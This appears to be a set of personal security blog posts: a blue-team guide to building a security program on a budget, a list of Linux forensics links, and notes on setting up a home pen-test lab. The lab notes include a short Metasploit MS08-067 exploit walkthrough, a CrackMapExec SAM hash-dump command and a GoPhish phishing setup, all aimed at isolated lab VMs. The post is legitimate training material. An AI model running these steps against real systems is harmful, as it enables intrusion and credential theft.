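# forward local port 5901 to the VNC server on the Kali VM over SSH
ssh -L 5901:localhost:5901 root@10.0.10.xx
# then point a VNC viewer on your workstation at localhost:5901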

In the next post, we’ll look some more at NMAP, as well as some other pen-test tools.

Security – Blue Team – Building a security project on a budget

How to Create and Build a Security Profile for Your Network on a Budget – Part 1

Start with Building a Foundation (or use an existing good one).

Credit to Kyle Bubp & irongeek.com: http://www.irongeek.com/i.php?page=videos/bsidescleveland2017/bsides-cleveland-102-blue-teamin-on-a-budget-of-zero-kyle-bubp

Use a Base Framework for your security project. There are a lot of standards available and the NIST government standards are a good solid foundation:

  • NIST 800-53
  • NIST Cybersecurity Framework
  • NIST CSF Tool – a nice visual, graphical interface for the stages of building a security program
  • CIS Critical Security Controls

Document everything

A core documentation repository is critical when setting up a security project – others will follow you and will need to look up the information you have recorded. It’s best to have a security incident response ticketing system and documentation before you need it. Have these tools up and ready.

For policy, procedure, how-tos, etc:

  • MediaWiki (free)
  • Atlassian Confluence ($10 for 10 users) – Gliffy plugin for Confluence
  • OneNote/SharePoint – not every company is entirely open source

Incident Response Ticketing/Documentation systems:

Map out your entire network

  • NetDB – uses the ARP tables and MAC address databases on your network gear. Give it a service account and NetDB will use SSH/Telnet to find every device connected and present them in a nice HTTP interface. You can set up a cron job that scans the NetDB database every hour and pipes new device connections to an email address. Knowing when something new comes onto your network is critical.

An .ova is available at https://www.kylebubp.com/files/netdb.ova

Supports the following: Cisco, Palo Alto, Junos, Aruba, Dell PowerConnect

  • nmap scans + ndiff/yandiff – not just for red teams; export the results and diff them for changes, alerting if something changed (see the example after this list).
  • NetDisco

https://sourceforge.net/projects/netdisco – uses SNMP to inventory your network devices.

  • Map your network – create a Visio document and have a good network map.
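A minimal sketch of the nmap + ndiff idea mentioned above (the subnet is just an example – use your own, and schedule the scans however you like):

# baseline scan saved as XML, then a later scan saved the same way
nmap -sn 10.0.10.0/24 -oX baseline.xml
nmap -sn 10.0.10.0/24 -oX today.xml
# show hosts that appeared, disappeared, or changed between the two scans
ndiff baseline.xml today.xml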

Visibility

Facebook developed osquery, and this tool can give you much of what you need.

Agents for MacOS, Windows, Linux

Deploy across your enterprise w/ Chef, Puppet, or SCCM

Do fun things like search for IoCs (FBI file hashes, processes) – pipe the data into the Elastic Stack for visibility and searchability.
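For example (a hedged sketch – the tables come from the standard osquery schema, and the file path is just an illustration), you can run ad-hoc queries with osqueryi:

# list a few running processes
osqueryi "SELECT pid, name, path FROM processes LIMIT 5;"
# hash a specific file so you can compare it against known-bad IoC hashes
osqueryi "SELECT path, md5, sha256 FROM hash WHERE path = '/usr/bin/ssh';"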

User Data Discovery

OpenDLP (on GitHub, or download an .ova) – scans file shares; using a normal user account, you can scan for available shares and data. Run it over the weekend and see what you can find. Then find the data owners and determine where the data should reside.

Hardening Your Network

CIS Benchmarks – Center for Internet Security Benchmarks: 100+ configuration guidelines for various technology groups to safeguard systems against today’s evolving cyber threats.

Out of the box, Windows 10 scores about 22% against the CIS benchmark.

It’s difficult to secure your network if everything is a snowflake. While not exciting, configuration management is important. Deploy configs across your org using tools like GPO, Chef, or Puppet.

Change management is also important – use a Git repo for tracking changes to your config scripts.

Safety vs. Risk

Scanning for Vulnerabilities:

OpenVAS (Greenbone) is a maintained fork of Nessus and is the default vulnerability scanner in AlienVault. It does a great job in comparison with commercial products. Be careful: do some safe scans first, and it’s not recommended to scan critical life-support equipment, for example in a hospital.

Scan web apps:

Arachni Framework – for finding bugs in your developer’s code

OWASP ZAP (Zed Attack Proxy)

Nikto2 (Server config scanner)
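As a quick example of a basic Nikto run (the target URL is a placeholder – only scan hosts you own or are authorized to test):

nikto -h http://testserver.example.com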

PortSwigger Burp Suite (not free – $350)

Harden your web servers:

Fail2ban – a Python-based IPS that runs off of Apache logs (a sample jail is sketched below)

ModSecurity – Open source WAF for Apache & IIS
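As a rough sketch of a Fail2ban jail (this assumes the stock apache-auth filter and a Debian/Ubuntu-style Apache log path; adjust both for your distribution), an entry in /etc/fail2ban/jail.local might look like:

[apache-auth]
# ban hosts that repeatedly fail Apache authentication
enabled  = true
port     = http,https
logpath  = /var/log/apache2/error.log
maxretry = 5
bantime  = 3600

Restart the fail2ban service after editing the jail file for the change to take effect.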

Linux Digital Forensics Web Resources

Below is a list of digital forensics resources for Linux. I especially enjoyed reading Luis Rocha’s intro guide to Linux Forensics (#19).

  1. VirusTotal – Free Online Virus, Malware and URL Scanner
  2. TSK Tool Overview – SleuthKitWiki
  3. The Sleuth Kit
  4. Taking advantage of Ext3 journaling file system in a forensic investigation
  5. SANS Digital Forensics and Incident Response Blog – Understanding EXT4 (Part 1)- Extents – SANS Institute
  6. SANS Digital Forensics and Incident Response Blog – Understanding EXT4 (Part 2)- Timestamps – SANS Institute
  7. SANS Digital Forensics and Incident Response Blog – Understanding EXT4 (Part 3)- Extent Trees – SANS Institute
  8. SANS Digital Forensics and Incident Response Blog – Understanding EXT4 (Part 4)- Demolition Derby – SANS Institute
  9. SANS Digital Forensics and Incident Response Blog – Understanding EXT4 (Part 5)- Large Extents – SANS Institute
  10. SANS Digital Forensics and Incident Response Blog – How To – Digital Forensics Copying A VMware VMDK – SANS Institute
  11. SANS Digital Forensics and Incident Response Blog – Blog – SANS Institute
  12. qemu-img(1)- QEMU disk image utility – Linux man page
  13. qemu-img for WIndows – Cloudbase Solutions
  14. National Software Reference Library (NSRL) – NIST
  15. ltrace – Wikipedia
  16. Logical Volume Manager (204.3)
  17. Linux-Unix and Computer Security Resources – Hal Pomeranz – Deer Run Associates
  18. The Law Enforcement and Forensic Examiner’s Introduction to Linux
  19. Intro to Linux Forensics – Count Upon Security
  20. https://www.kernel.org/doc/Documentation/filesystems/ext4.txt
  21. GitHub – log2timeline/plaso – Super timeline all the things
  22. Filesystem Hierarchy Standard
  23. Digital Forensics – SuperTimeline & Event Logs – Part I – Count Upon Security
  24. Digital Forensics – NTFS Metadata Timeline Creation – Count Upon Security
  25. Digital Forensics – Evidence Acquisition and EWF Mounting – Count Upon Security
  26. chkrootkit — locally checks for signs of a rootkit

Building a penetration test lab – Part 1

Notes on how to create a Penetration Testing Lab

I’ve always had an interest in penetration testing and have messed around with nmap and Nessus, but now I’m going to dig in my heels and become proficient with the tools of the pen-test theater. The following post is more of an outline of what is found in a YouTube video I found here, from DerbyCon 2016. This speaker, along with a few others who have spoken, was inspiring because they said that sysadmins make good penetration testers. They mentioned that people who are good at building systems and networks generally do well at breaking them down and actively locating and fixing problems in other systems. I am not looking to become a script kiddie, or a black-hat/dark-side cracker for that matter, but I do hope to become proficient with the tools they use, as well as work with Python to build my own tools.

Since I last upgraded my VM server to Proxmox, I’ve been kicking around ideas on how to use the hardware to its fullest potential. I’ve already gotten started by first creating a new network on my Proxmox host, and I started up the first server in my segregated ‘insecure’ network by spinning up an isc-dhcp-server. I’ll probably post info on my build as I go along, so stay tuned.

-Start of Video notes-

Credit: David Boyd
Pentest lab requirements:

  • Core i5 CPU
  • 16 GB RAM
  • 250-500 GB HDD
  • 7zip

VM software:

  • VirtualBox
  • VMware
  • Hyper-V
  • (I’ll be using) ProxMox

Pentesting platforms:

  • Kali Linux
  • Samurai WTF (WebAppTesting)
  • SamuraiSTFU(Utility Hacking)
  • Deft Linux (Forensics)

Old stuff:

  • olpix (?)
  • IWax(?)
  • backtrack (now Kali)

Offensive Security provides pre-compiled Linux distro images.

Note: generate your own SSH keys

Now we need something to attack…
Vulnerable VMs:

  • Metasploitable 2 (Metasploit) – an intentionally vulnerable Ubuntu VM with remote logins, backdoors, default passwords, and vulnerable web services
  • Morning Catch (Phishing)
  • OWASP Broken Web Applications (WebApps)
  • WebGoat (Web Applications)
  • vulnhub.com (challenge VMs)
  • Kioptrix (Beginners)
  • PwnOS

Guides to pen-test exploits:
https://community.rapid7.com/docs/DOC-1875

Introducing Morning Catch
http://blog.cobaltstrike.com/2014/08/06/introducing-morning-catch-a-phishing-paradise/ – real working phishing lab

Sans Mutillidae Whitepaper
https://www.sans.org/reading-room/whitepapers/testing/introduction-owasp-mutillidae-ii-web-pen-test-training-environment-34380

VMs to build and test:

Do not expose vulnerable VMs to the internet!
Make them host-only (or, in Proxmox, create a new bridge).

More tools:

  • nmap
  • Nessus
  • Cain (still works)
  • Responder
  • John the Ripper / hashcat
  • Metasploit (free version works great)
  • SET / GoPhish / SPF (social engineering)
  • Discover Scripts – great stuff – great reconnaissance
  • PowerShell Empire
  • CrackMapExec (post-exploitation)

How to Build a test domain controller, and add users with various privileges:
http://thehackerplaybook.com/windows-domain.htm

Once the virtual machines have been set up and set to ‘host only’, ping each VM to confirm connectivity.

Initial testing and exploit example:

On Kali:
nmap 192.168.110.2 (XP)
nmap -O 192.168.110.2 (checks for OS)
msfconsole
msf> search ms08-067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
(shows module options)
msf exploit(ms08_067_netapi) > set RHOST 192.168.110.2
msf exploit(ms08_067_netapi) > exploit

kali:~# crackmapexec
(dumps hashes)
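As a hedged example of a credentialed sweep (the subnet matches the lab network above, the credentials are placeholders, and newer CrackMapExec versions take the protocol as the first argument):

crackmapexec smb 192.168.110.0/24 -u Administrator -p 'Password123' --sam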

Phishing server – load up GoPhish – set up and add users, then make a campaign

Additional training:
Metasploit unleashed
https://www.offensive-security.com/metasploit-unleashed

Hack This Site!
https://www.hackthissite.org/
Youtube videos:
DerbyCon, BSides, DEF CON, ISSA

More information: Sans Cyber Aces, InfoSec Institute, Cybrary

It’s wise to find a mentor, as well as do some mentoring

Recommended reading (actual paper books):

  • The Hacker Playbook
  • Penetration Testing: A Hands-On Introduction to Hacking – Georgia Weidman
  • Metasploit – The Penetration Tester’s Guide
  • Hacking: The Art of Exploitation – Jon Erickson
  • Professional Penetration Testing
  • The Art of Intrusion – Kevin Mitnick
  • The Art of Deception – Kevin Mitnick
  • Ghost in the Wires – Kevin Mitnick
  • Black Hat Python – Justin Seitz

-End video notes-